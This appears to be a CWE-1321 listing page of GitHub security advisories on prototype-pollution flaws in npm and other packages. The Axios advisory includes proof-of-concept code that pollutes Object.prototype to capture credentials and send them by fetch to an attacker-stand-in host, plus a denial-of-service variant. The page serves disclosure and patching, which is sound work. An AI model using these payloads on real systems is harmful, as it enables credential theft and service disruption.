CWE-1321
AllowedImproperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')
Abstraction: Variant · Status: Incomplete
The product receives input from an upstream component that specifies attributes that are to be initialized or updated in an object, but it does not properly control modifications of attributes of the object prototype.
779 vulnerabilities reference this CWE, most recent first.
GHSA-36C4-4R89-6WHG
Vulnerability from github – Published: 2020-09-03 15:49 – Updated: 2021-10-04 21:05Versions of @commercial/subtext prior to 5.1.2 are vulnerable to Prototype Pollution. A multipart payload can be constructed in a way that one of the parts’ content can be set as the entire payload object’s prototype. If this prototype contains data, it may bypass other validation rules which enforce access and privacy. If this prototype evaluates to null, it can cause unhandled exceptions when the request payload is accessed.
Recommendation
Upgrade to version 5.1.2 or later.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "@commercial/subtext"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "5.1.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2020-08-31T19:01:00Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "Versions of `@commercial/subtext` prior to 5.1.2 are vulnerable to Prototype Pollution. A multipart payload can be constructed in a way that one of the parts\u2019 content can be set as the entire payload object\u2019s prototype. If this prototype contains data, it may bypass other validation rules which enforce access and privacy. If this prototype evaluates to null, it can cause unhandled exceptions when the request payload is accessed.\n\n\n## Recommendation\n\nUpgrade to version 5.1.2 or later.",
"id": "GHSA-36c4-4r89-6whg",
"modified": "2021-10-04T21:05:01Z",
"published": "2020-09-03T15:49:02Z",
"references": [
{
"type": "WEB",
"url": "https://www.npmjs.com/advisories/1484"
}
],
"schema_version": "1.4.0",
"severity": [],
"summary": "Prototype Pollution in @commercial/subtext"
}
GHSA-3829-MGMW-JCG4
Vulnerability from github – Published: 2022-07-01 00:01 – Updated: 2022-07-11 19:25deep.assign npm package 0.0.0-alpha.0 is vulnerable to Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution').
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "deep.assign"
},
"versions": [
"0.0.0-alpha.0"
]
}
],
"aliases": [
"CVE-2021-40663"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2022-07-06T19:51:54Z",
"nvd_published_at": "2022-06-30T12:15:00Z",
"severity": "CRITICAL"
},
"details": "deep.assign npm package 0.0.0-alpha.0 is vulnerable to Improperly Controlled Modification of Object Prototype Attributes (\u0027Prototype Pollution\u0027).",
"id": "GHSA-3829-mgmw-jcg4",
"modified": "2022-07-11T19:25:08Z",
"published": "2022-07-01T00:01:14Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-40663"
},
{
"type": "WEB",
"url": "https://github.com/janbialostok/deep-assign/issues/1"
},
{
"type": "PACKAGE",
"url": "https://github.com/janbialostok/deep-assign"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20220826-0002"
},
{
"type": "WEB",
"url": "https://www.npmjs.com/package/deep.assign"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Prototype Pollution in deep.assign"
}
GHSA-39QV-PRMH-X37F
Vulnerability from github – Published: 2022-02-05 00:00 – Updated: 2022-02-11 16:16This affects the package @strikeentco/set before 1.0.2. It allows an attacker to cause a denial of service and may lead to remote code execution. Note: This vulnerability derives from an incomplete fix in https://security.snyk.io/vuln/SNYK-JS-STRIKEENTCOSET-1038821
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "@strikeentco/set"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.0.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2021-23497"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2022-02-07T17:19:41Z",
"nvd_published_at": "2022-02-04T20:15:00Z",
"severity": "HIGH"
},
"details": "This affects the package @strikeentco/set before 1.0.2. It allows an attacker to cause a denial of service and may lead to remote code execution. **Note:** This vulnerability derives from an incomplete fix in https://security.snyk.io/vuln/SNYK-JS-STRIKEENTCOSET-1038821",
"id": "GHSA-39qv-prmh-x37f",
"modified": "2022-02-11T16:16:33Z",
"published": "2022-02-05T00:00:26Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-23497"
},
{
"type": "WEB",
"url": "https://github.com/strikeentco/set/commit/b2f942c"
},
{
"type": "WEB",
"url": "https://github.com/strikeentco/set"
},
{
"type": "WEB",
"url": "https://security.snyk.io/vuln/SNYK-JS-STRIKEENTCOSET-1038821"
},
{
"type": "WEB",
"url": "https://snyk.io/blog/remediate-javascript-type-confusion-bypassed-input-validation"
},
{
"type": "WEB",
"url": "https://snyk.io/vuln/SNYK-JS-STRIKEENTCOSET-2385945"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Prototype Pollution in @strikeentco/set"
}
GHSA-39WV-QJGJ-4JXG
Vulnerability from github – Published: 2022-02-25 00:00 – Updated: 2022-03-17 00:05Due to the formatting logic of the "console.table()" function it was not safe to allow user controlled input to be passed to the "properties" parameter while simultaneously passing a plain object with at least one property as the first parameter, which could be "proto". The prototype pollution has very limited control, in that it only allows an empty string to be assigned to numerical keys of the object prototype.Node.js >= 12.22.9, >= 14.18.3, >= 16.13.2, and >= 17.3.1 use a null protoype for the object these properties are being assigned to.
{
"affected": [],
"aliases": [
"CVE-2022-21824"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-02-24T19:15:00Z",
"severity": "HIGH"
},
"details": "Due to the formatting logic of the \"console.table()\" function it was not safe to allow user controlled input to be passed to the \"properties\" parameter while simultaneously passing a plain object with at least one property as the first parameter, which could be \"__proto__\". The prototype pollution has very limited control, in that it only allows an empty string to be assigned to numerical keys of the object prototype.Node.js \u003e= 12.22.9, \u003e= 14.18.3, \u003e= 16.13.2, and \u003e= 17.3.1 use a null protoype for the object these properties are being assigned to.",
"id": "GHSA-39wv-qjgj-4jxg",
"modified": "2022-03-17T00:05:16Z",
"published": "2022-02-25T00:00:57Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-21824"
},
{
"type": "WEB",
"url": "https://hackerone.com/reports/1431042"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00006.html"
},
{
"type": "WEB",
"url": "https://nodejs.org/en/blog/vulnerability/jan-2022-security-releases"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20220325-0007"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20220729-0004"
},
{
"type": "WEB",
"url": "https://www.debian.org/security/2022/dsa-5170"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpujul2022.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-3C3P-XH4F-PFH7
Vulnerability from github – Published: 2025-09-24 21:30 – Updated: 2025-09-26 12:56json-schema-editor-visual is a package that provides jsonschema editor. A Prototype Pollution vulnerability in the setData and deleteData function of json-schema-editor-visual versions thru 1.1.1 allows attackers to inject or delete properties on Object.prototype via supplying a crafted payload, causing denial of service (DoS) as the minimum consequence.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "json-schema-editor-visual"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "2.0.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-57320"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2025-09-26T12:56:51Z",
"nvd_published_at": "2025-09-24T21:15:32Z",
"severity": "MODERATE"
},
"details": "json-schema-editor-visual is a package that provides jsonschema editor. A Prototype Pollution vulnerability in the setData and deleteData function of json-schema-editor-visual versions thru 1.1.1 allows attackers to inject or delete properties on Object.prototype via supplying a crafted payload, causing denial of service (DoS) as the minimum consequence.",
"id": "GHSA-3c3p-xh4f-pfh7",
"modified": "2025-09-26T12:56:51Z",
"published": "2025-09-24T21:30:37Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-57320"
},
{
"type": "WEB",
"url": "https://github.com/VulnSageAgent/PoCs/blob/main/JavaScript/prototype-pollution/json-schema-editor-visual%401.1.1/index.js"
},
{
"type": "WEB",
"url": "https://github.com/VulnSageAgent/PoCs/tree/main/JavaScript/prototype-pollution/CVE-2025-57320"
},
{
"type": "PACKAGE",
"url": "https://github.com/zyqwst/json-schema-editor-vue"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L",
"type": "CVSS_V3"
}
],
"summary": "json-schema-editor-visual vulnerable to prototype pollution"
}
GHSA-3C9C-2P65-QVWV
Vulnerability from github – Published: 2021-09-27 20:12 – Updated: 2022-05-26 19:50Impact
The vulnerability exposes Aurelia application that uses aurelia-path package to parse a string. The majority of this will be Aurelia applications that employ the aurelia-router package. An example is this could allow an attacker to change the prototype of base object class Object by tricking an application to parse the following URL: https://aurelia.io/blog/?__proto__[asdf]=asdf
Patches
The problem should be patched in version 1.1.7. Any version earlier than this is vulnerable.
Workarounds
A partial work around is to free the Object prototype:
Object.freeze(Object.prototype)
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "aurelia-path"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.1.7"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2021-41097"
],
"database_specific": {
"cwe_ids": [
"CWE-1321",
"CWE-915"
],
"github_reviewed": true,
"github_reviewed_at": "2021-09-27T19:18:37Z",
"nvd_published_at": "2021-09-27T18:15:00Z",
"severity": "CRITICAL"
},
"details": "### Impact\nThe vulnerability exposes Aurelia application that uses `aurelia-path` package to parse a string. The majority of this will be Aurelia applications that employ the `aurelia-router` package. An example is this could allow an attacker to change the prototype of base object class `Object` by tricking an application to parse the following URL: `https://aurelia.io/blog/?__proto__[asdf]=asdf`\n\n### Patches\nThe problem should be patched in version `1.1.7`. Any version earlier than this is vulnerable.\n\n### Workarounds\nA partial work around is to free the Object prototype:\n```ts\nObject.freeze(Object.prototype)\n```",
"id": "GHSA-3c9c-2p65-qvwv",
"modified": "2022-05-26T19:50:24Z",
"published": "2021-09-27T20:12:16Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/aurelia/path/security/advisories/GHSA-3c9c-2p65-qvwv"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-41097"
},
{
"type": "WEB",
"url": "https://github.com/aurelia/path/issues/44"
},
{
"type": "WEB",
"url": "https://github.com/aurelia/path/commit/7c4e235433a4a2df9acc313fbe891758084fdec1"
},
{
"type": "PACKAGE",
"url": "https://github.com/aurelia/path"
},
{
"type": "WEB",
"url": "https://github.com/aurelia/path/releases/tag/1.1.7"
},
{
"type": "WEB",
"url": "https://www.npmjs.com/package/aurelia-path"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Prototype pollution in aurelia-path"
}
GHSA-3F95-W5H5-FQ86
Vulnerability from github – Published: 2020-09-11 21:22 – Updated: 2020-08-31 18:43All versions of mergify are vulnerable to Prototype Pollution. The mergify() function allows attackers to modify the prototype of Object causing the addition or modification of an existing property that will exist on all objects.
Recommendation
No fix is currently available. Consider using an alternative module as the package is deprecated.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "mergify"
},
"ranges": [
{
"events": [
{
"introduced": "0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2020-08-31T18:43:27Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "All versions of `mergify` are vulnerable to Prototype Pollution. The `mergify()` function allows attackers to modify the prototype of Object causing the addition or modification of an existing property that will exist on all objects.\n\n\n\n\n## Recommendation\n\nNo fix is currently available. Consider using an alternative module as the package is deprecated.",
"id": "GHSA-3f95-w5h5-fq86",
"modified": "2020-08-31T18:43:27Z",
"published": "2020-09-11T21:22:24Z",
"references": [
{
"type": "WEB",
"url": "https://hackerone.com/reports/439098"
},
{
"type": "WEB",
"url": "https://www.npmjs.com/advisories/995"
}
],
"schema_version": "1.4.0",
"severity": [],
"summary": "Prototype Pollution in mergify"
}
GHSA-3FH5-Q6FG-W28Q
Vulnerability from github – Published: 2022-10-27 18:36 – Updated: 2022-10-27 18:36Impact
The Snowboard framework in affected versions is vulnerable to prototype pollution in the main Snowboard class as well as its plugin loader.
Patches
This issue has been patched in https://github.com/wintercms/winter/commit/2a13faf99972e84c9661258f16c4750fa99d29a1 (for 1.2) and https://github.com/wintercms/winter/commit/bce4b59584abf961e9400af3d7a4fd7638e26c7f (for 1.1) and is available with Winter v1.1.10 and v1.2.1.
Workarounds
If you have not yet upgraded, or are using the 1.1 branch of Winter (1.1.8 or above), you can avoid this issue by following some common security practices for JavaScript, including implementing a content security policy and auditing your scripts.
The 1.0 branch of Winter is not affected, as it does not contain the Snowboard framework.
For more information
If you have any questions or comments about this advisory:
- Email us at hello@wintercms.com
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "wintercms/winter"
},
"ranges": [
{
"events": [
{
"introduced": "1.1.8"
},
{
"fixed": "1.1.10"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "wintercms/winter"
},
"ranges": [
{
"events": [
{
"introduced": "1.2.0"
},
{
"fixed": "1.2.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2022-39357"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2022-10-27T18:36:42Z",
"nvd_published_at": "2022-10-26T15:15:00Z",
"severity": "HIGH"
},
"details": "### Impact\n\nThe Snowboard framework in affected versions is vulnerable to prototype pollution in the main Snowboard class as well as its plugin loader. \n\n### Patches\n\nThis issue has been patched in https://github.com/wintercms/winter/commit/2a13faf99972e84c9661258f16c4750fa99d29a1 (for 1.2) and https://github.com/wintercms/winter/commit/bce4b59584abf961e9400af3d7a4fd7638e26c7f (for 1.1) and is available with Winter v1.1.10 and v1.2.1.\n\n### Workarounds\n\nIf you have not yet upgraded, or are using the 1.1 branch of Winter (1.1.8 or above), you can avoid this issue by following some common security practices for JavaScript, including implementing a [content security policy](https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP) and auditing your scripts.\n\nThe 1.0 branch of Winter is not affected, as it does not contain the Snowboard framework.\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n\n- Email us at [hello@wintercms.com](mailto:hello@wintercms.com)\n",
"id": "GHSA-3fh5-q6fg-w28q",
"modified": "2022-10-27T18:36:42Z",
"published": "2022-10-27T18:36:42Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/wintercms/winter/security/advisories/GHSA-3fh5-q6fg-w28q"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-39357"
},
{
"type": "WEB",
"url": "https://github.com/wintercms/winter/commit/2a13faf99972e84c9661258f16c4750fa99d29a1"
},
{
"type": "WEB",
"url": "https://github.com/wintercms/winter/commit/bce4b59584abf961e9400af3d7a4fd7638e26c7f"
},
{
"type": "PACKAGE",
"url": "https://github.com/wintercms/winter"
},
{
"type": "WEB",
"url": "https://github.com/wintercms/winter/releases/tag/v1.1.10"
},
{
"type": "WEB",
"url": "https://github.com/wintercms/winter/releases/tag/v1.2.1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Prototype pollution in Snowboard framework"
}
GHSA-3G43-6GMG-66JW
Vulnerability from github – Published: 2026-05-29 16:07 – Updated: 2026-06-12 19:25Summary
Axios versions before the fixed releases contain prototype-pollution gadgets in request config processing. If another vulnerability in the same JavaScript process has already polluted Object.prototype.transformResponse, affected Axios versions may treat that inherited value as request configuration or as an option validator.
Axios does not itself create the prototype pollution. Exploitability requires a separate prototype-pollution vulnerability or equivalent attacker control over Object.prototype before Axios creates a request.
Impact
For ordinary prototype-pollution primitives that can only assign JSON-like values, this issue primarily results in request failures or denial-of-service attacks.
If the attacker can pollute Object.prototype.transformResponse with a function, affected versions of Axios may execute it. In fully affected versions, the function can observe response data and request config, including URL, headers, and auth, and can change the response data returned to application code.
This function-valued condition is important. Most query-string or JSON parser prototype-pollution bugs cannot create JavaScript functions on their own, so credential exposure and response tampering are conditional rather than automatic consequences of such bugs.
Affected Functionality
The affected functionality is Axios request config processing and response transformation.
Affected use requires all of the following:
- An affected Axios version.
- A polluted Object.prototype in the same process or browser context.
- Pollution before Axios merges or validates the request config.
- A polluted key relevant to Axios config, especially transformResponse.
This is not specific to the Node HTTP adapter. Browser and Node usage can both pass through the shared config/transform pipeline, though real-world exploitability depends on the surrounding application and any helper vulnerabilities.
Technical Details
In affected versions, mergeConfig() reads config values through normal property access. For config keys present in Axios defaults, including transformResponse, a missing own property on the request config can fall through to Object.prototype.
In the fully affected path, this means Object.prototype.transformResponse can replace Axios's default response transform. The selected transform is later executed by transformData() with the request config as this.
Some later affected v1 releases guarded the merge path but still used inherited properties while looking up validators in validator.assertOptions(). In that narrower case, a polluted function can still run during config validation and inspect the config argument, but it does not replace the response transform.
Fixed versions use own-property checks and null-prototype config objects, so inherited Object.prototype values are not treated as Axios config or validator schema entries.
Proof of Concept of Attack
import http from 'http';
import axios from 'axios';
const seen = [];
const server = http.createServer((req, res) => {
res.setHeader('Content-Type', 'application/json');
res.end(JSON.stringify({ secret: 'response-secret' }));
});
await new Promise(resolve => server.listen(0, '127.0.0.1', resolve));
Object.prototype.transformResponse = function pollutedTransform(data, headers, status) {
if (headers && typeof status === 'number') {
seen.push({
url: this.url,
username: this.auth && this.auth.username,
password: this.auth && this.auth.password,
responseData: data
});
return { hijacked: true };
}
return true;
};
try {
const { port } = server.address();
const response = await axios.get(`http://127.0.0.1:${port}/users`, {
auth: { username: 'svc-account', password: 'prod-secret-key-123' }
});
console.log(response.data); // { hijacked: true }
console.log(seen[0]); // request config plus original response body
} finally {
delete Object.prototype.transformResponse;
server.close();
}
Expected result on fully affected versions: the polluted transform runs, captures request config and response data, and replaces the response returned to the caller.
Expected result on fixed versions: the polluted transform is ignored, and the original response is returned.
Original source report ## Summary The Axios library is vulnerable to a Prototype Pollution "Gadget" attack that allows any `Object.prototype` pollution in the application's dependency tree to be escalated into **credential theft** and **response hijacking** across all Axios requests. The `mergeConfig()` function reads config properties via standard property access (`config2[prop]`), which traverses the JavaScript prototype chain. When `Object.prototype.transformResponse` is polluted with a function, it **overrides the default JSON response parser** for every request. The injected function executes with `this = config`, exposing `auth.username`, `auth.password`, request URL, and all headers. **Severity:** High (CVSS 8.2) **Affected Versions:** All versions (v0.x - v1.x including v1.15.0) **Vulnerable Component:** `lib/core/mergeConfig.js` (Config Merge) + `lib/core/transformData.js` (Transform Execution) ## CWE - **CWE-1321:** Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') ## CVSS 3.1 **Score: 9.4 (High)** Vector: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H` | Metric | Value | Justification | |---|---|---| | Attack Vector | Network | PP is triggered remotely via any vulnerable dependency | | Attack Complexity | Low | Once PP exists, a single property assignment exploits axios. Consistent with GHSA-fvcv-3m26-pcqx scoring | | Privileges Required | None | No authentication needed | | User Interaction | None | No user interaction required | | Scope | Unchanged | Credential theft occurs within the same application process | | Confidentiality | High | `this.auth.password`, `this.url`, original response data all exfiltrated | | Integrity | Low | Response data is replaced with `true` — attacker **cannot** return arbitrary data due to `assertOptions` constraint (see below) | | Availability | High | Polluting with an array value causes `TypeError: validator is not a function` crash (DoS) on every request | ### Relationship to GHSA-fvcv-3m26-pcqx This vulnerability is in the same class as GHSA-fvcv-3m26-pcqx ("Unrestricted Cloud Metadata Exfiltration via Header Injection Chain"), which was also a PP gadget in axios rated Critical. Both require zero direct user input and exploit `mergeConfig`'s prototype chain traversal. | Factor | GHSA-fvcv-3m26-pcqx | This Vulnerability | |---|---|---| | Attack vector | PP → Header injection → Request smuggling | PP → Transform function override → Credential theft | | Fixed by 1.15.0 header sanitization? | Yes | **No — different code path** | | Affects | Requests using form-data package | **All requests** (transformResponse is in defaults) | | Impact | AWS IMDSv2 bypass, cloud compromise | Credential theft (auth, API keys), response hijacking, DoS | ## Usage of "Helper" Vulnerabilities This vulnerability requires **Zero Direct User Input**. If an attacker can pollute `Object.prototype` via any other library in the stack (e.g., `qs`, `minimist`, `lodash`, `body-parser`), Axios will automatically pick up the polluted `transformResponse` property during its config merge. The critical difference from GHSA-fvcv-3m26-pcqx: this vector was **NOT fixed** by the header sanitization patch in v1.15.0, because it does not use headers at all — it injects a function into the response processing pipeline. ## Proof of Concept ### 1. The Setup (Simulated Pollution) Imagine a scenario where a known vulnerability exists in a query parser. The attacker sends a payload that sets:Object.prototype.transformResponse = function(data, headers, status) {
// Steal credentials via this context (this = full request config)
if (this && this.url && typeof data === 'string') {
fetch('https://attacker.com/exfil', {
method: 'POST',
body: JSON.stringify({
url: this.url,
username: this.auth?.username,
password: this.auth?.password,
responseData: data,
})
});
}
return true; // MUST return true to pass assertOptions validator check
};
**Important constraint:** The polluted value must be a **function returning `true`**, not an array. If an array is used, `assertOptions()` at `validator.js:89-92` crashes with `TypeError: validator is not a function` (which is still a DoS vector). The function must return `true` because `validator.js:93` checks `result !== true`.
### 2. The Gadget Trigger (Safe Code)
The application makes a completely safe, hardcoded request:
// This looks safe to the developer
const response = await axios.get('https://api.internal/users', {
auth: { username: 'svc-account', password: 'prod-secret-key-123!' }
});
### 3. The Execution
Axios's `mergeConfig()` at `mergeConfig.js:99-103` iterates config keys:
utils.forEach(Object.keys({...config1, ...config2}), function computeConfigValue(prop) {
// 'transformResponse' is in config1 (defaults) → included in keys
const merge = mergeMap[prop]; // → defaultToConfig2
const configValue = merge(config1[prop], config2[prop], prop);
// config2['transformResponse'] traverses prototype → finds polluted function!
});
The polluted function then executes at `transformData.js:21`:
data = fn.call(config, data, headers.normalize(), response ? response.status : undefined);
// fn = attacker's function, this = config (containing auth credentials)
### 4. The Impact
Attacker receives at https://attacker.com/exfil:
{
"url": "https://api.internal/users",
"username": "svc-account",
"password": "prod-secret-key-123!",
"responseData": "{\"users\":[{\"id\":1,\"role\":\"admin\"}]}"
}
The response data seen by the application is `true` (the required return value), which will likely cause the application to malfunction but will not reveal the theft.
### 5. DoS Variant
// Array pollution crashes every request
Object.prototype.transformResponse = [function(d) { return d; }];
await axios.get('https://any-url.com');
// → TypeError: validator is not a function
// Every request in the application crashes
## Verified PoC Output
Step 1 - Normal behavior (before pollution):
Default transformResponse function name: "transformResponse"
Step 2 - Polluting Object.prototype.transformResponse:
Function replaced by attacker: true
Step 3 - Simulating dispatchRequest transformResponse:
Original server response: {"secret_key":"sk-prod-a1b2c3d4","internal_ip":"10.0.0.5"}
After malicious transform: true
Response tampered: true
Step 4 - Exfiltrated data:
Original response data: {"secret_key":"sk-prod-a1b2c3d4","internal_ip":"10.0.0.5"}
Request URL: https://internal-api.corp/secrets
Authentication info: {"username":"admin","password":"P@ssw0rd123!"}
## Impact Analysis
- **Credential Theft:** `this.auth.username`, `this.auth.password`, `this.headers.Authorization`, and all other config properties are accessible to the injected function. The attacker can exfiltrate them to an external server.
- **Response Data Exfiltration:** The original server response (`data` parameter) is available to the injected function before being replaced.
- **Universal Scope:** Affects **every** axios request in the application, including all third-party libraries that use axios.
- **Denial of Service:** Polluting with a non-function value crashes every request.
- **Bypass of 1.15.0 Fix:** The header sanitization patch in v1.15.0 (GHSA-fvcv-3m26-pcqx fix) does not address this vector.
### Limitations (Honest Assessment)
- Requires a separate prototype pollution vulnerability elsewhere in the dependency tree
- Response data cannot be arbitrarily tampered — the function must return `true` to pass `assertOptions`
- This is in-process JavaScript function execution, not OS-level RCE
## Recommended Fix
Use `hasOwnProperty` checks in `defaultToConfig2` to prevent prototype chain traversal:
// In lib/core/mergeConfig.js
function defaultToConfig2(a, b, prop) {
if (Object.prototype.hasOwnProperty.call(config2, prop) && !utils.isUndefined(b)) {
return getMergedValue(undefined, b);
} else if (!utils.isUndefined(a)) {
return getMergedValue(undefined, a);
}
}
Additionally, validate that `transformResponse` contains only functions before execution:
// In lib/core/transformData.js
utils.forEach(fns, function transform(fn) {
if (typeof fn !== 'function') {
throw new AxiosError('Transform must be a function', AxiosError.ERR_BAD_OPTION);
}
data = fn.call(config, data, headers.normalize(), response ? response.status : undefined);
});
## Resources
- [CWE-1321: Prototype Pollution](https://cwe.mitre.org/data/definitions/1321.html)
- [GHSA-fvcv-3m26-pcqx: Related PP Gadget in Axios (Fixed in 1.15.0)](https://github.com/advisories/GHSA-fvcv-3m26-pcqx)
- [Axios GitHub Repository](https://github.com/axios/axios)
- [Snyk: Prototype Pollution](https://learn.snyk.io/lesson/prototype-pollution/)
## Timeline
| Date | Event |
|---|---|
| 2026-04-15 | Vulnerability discovered during source code audit |
| 2026-04-15 | Initial PoC developed (array payload — crashes at validator.js) |
| 2026-04-16 | PoC corrected (function payload returning true — works) |
| 2026-04-16 | Report revised with accurate constraints |
| TBD | Report submitted to vendor via GitHub Security Advisory |
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "axios"
},
"ranges": [
{
"events": [
{
"introduced": "1.0.0"
},
{
"fixed": "1.15.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "axios"
},
"ranges": [
{
"events": [
{
"introduced": "0.19.0"
},
{
"fixed": "0.31.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-44495"
],
"database_specific": {
"cwe_ids": [
"CWE-1321",
"CWE-94"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-29T16:07:31Z",
"nvd_published_at": "2026-06-11T17:16:33Z",
"severity": "HIGH"
},
"details": "## Summary\n\nAxios versions before the fixed releases contain prototype-pollution gadgets in request config processing. If another vulnerability in the same JavaScript process has already polluted `Object.prototype.transformResponse`, affected Axios versions may treat that inherited value as request configuration or as an option validator.\n\nAxios does not itself create the prototype pollution. Exploitability requires a separate prototype-pollution vulnerability or equivalent attacker control over `Object.prototype` before Axios creates a request.\n\n## Impact\nFor ordinary prototype-pollution primitives that can only assign JSON-like values, this issue primarily results in request failures or denial-of-service attacks.\n\nIf the attacker can pollute `Object.prototype.transformResponse` with a function, affected versions of Axios may execute it. In fully affected versions, the function can observe response data and request config, including URL, headers, and `auth`, and can change the response data returned to application code.\n\nThis function-valued condition is important. Most query-string or JSON parser prototype-pollution bugs cannot create JavaScript functions on their own, so credential exposure and response tampering are conditional rather than automatic consequences of such bugs.\n\n## Affected Functionality\nThe affected functionality is Axios request config processing and response transformation.\n\nAffected use requires all of the following:\n- An affected Axios version.\n- A polluted `Object.prototype` in the same process or browser context.\n- Pollution before Axios merges or validates the request config.\n- A polluted key relevant to Axios config, especially `transformResponse`.\n\nThis is not specific to the Node HTTP adapter. Browser and Node usage can both pass through the shared config/transform pipeline, though real-world exploitability depends on the surrounding application and any helper vulnerabilities.\n\n## Technical Details\nIn affected versions, `mergeConfig()` reads config values through normal property access. For config keys present in Axios defaults, including `transformResponse`, a missing own property on the request config can fall through to `Object.prototype`.\n\nIn the fully affected path, this means `Object.prototype.transformResponse` can replace Axios\u0027s default response transform. The selected transform is later executed by `transformData()` with the request config as `this`.\n\nSome later affected v1 releases guarded the merge path but still used inherited properties while looking up validators in `validator.assertOptions()`. In that narrower case, a polluted function can still run during config validation and inspect the config argument, but it does not replace the response transform.\n\nFixed versions use own-property checks and null-prototype config objects, so inherited `Object.prototype` values are not treated as Axios config or validator schema entries.\n\n## Proof of Concept of Attack\n```js\nimport http from \u0027http\u0027;\nimport axios from \u0027axios\u0027;\n\nconst seen = [];\n\nconst server = http.createServer((req, res) =\u003e {\n res.setHeader(\u0027Content-Type\u0027, \u0027application/json\u0027);\n res.end(JSON.stringify({ secret: \u0027response-secret\u0027 }));\n});\n\nawait new Promise(resolve =\u003e server.listen(0, \u0027127.0.0.1\u0027, resolve));\n\nObject.prototype.transformResponse = function pollutedTransform(data, headers, status) {\n if (headers \u0026\u0026 typeof status === \u0027number\u0027) {\n seen.push({\n url: this.url,\n username: this.auth \u0026\u0026 this.auth.username,\n password: this.auth \u0026\u0026 this.auth.password,\n responseData: data\n });\n\n return { hijacked: true };\n }\n\n return true;\n};\n\ntry {\n const { port } = server.address();\n\n const response = await axios.get(`http://127.0.0.1:${port}/users`, {\n auth: { username: \u0027svc-account\u0027, password: \u0027prod-secret-key-123\u0027 }\n });\n\n console.log(response.data); // { hijacked: true }\n console.log(seen[0]); // request config 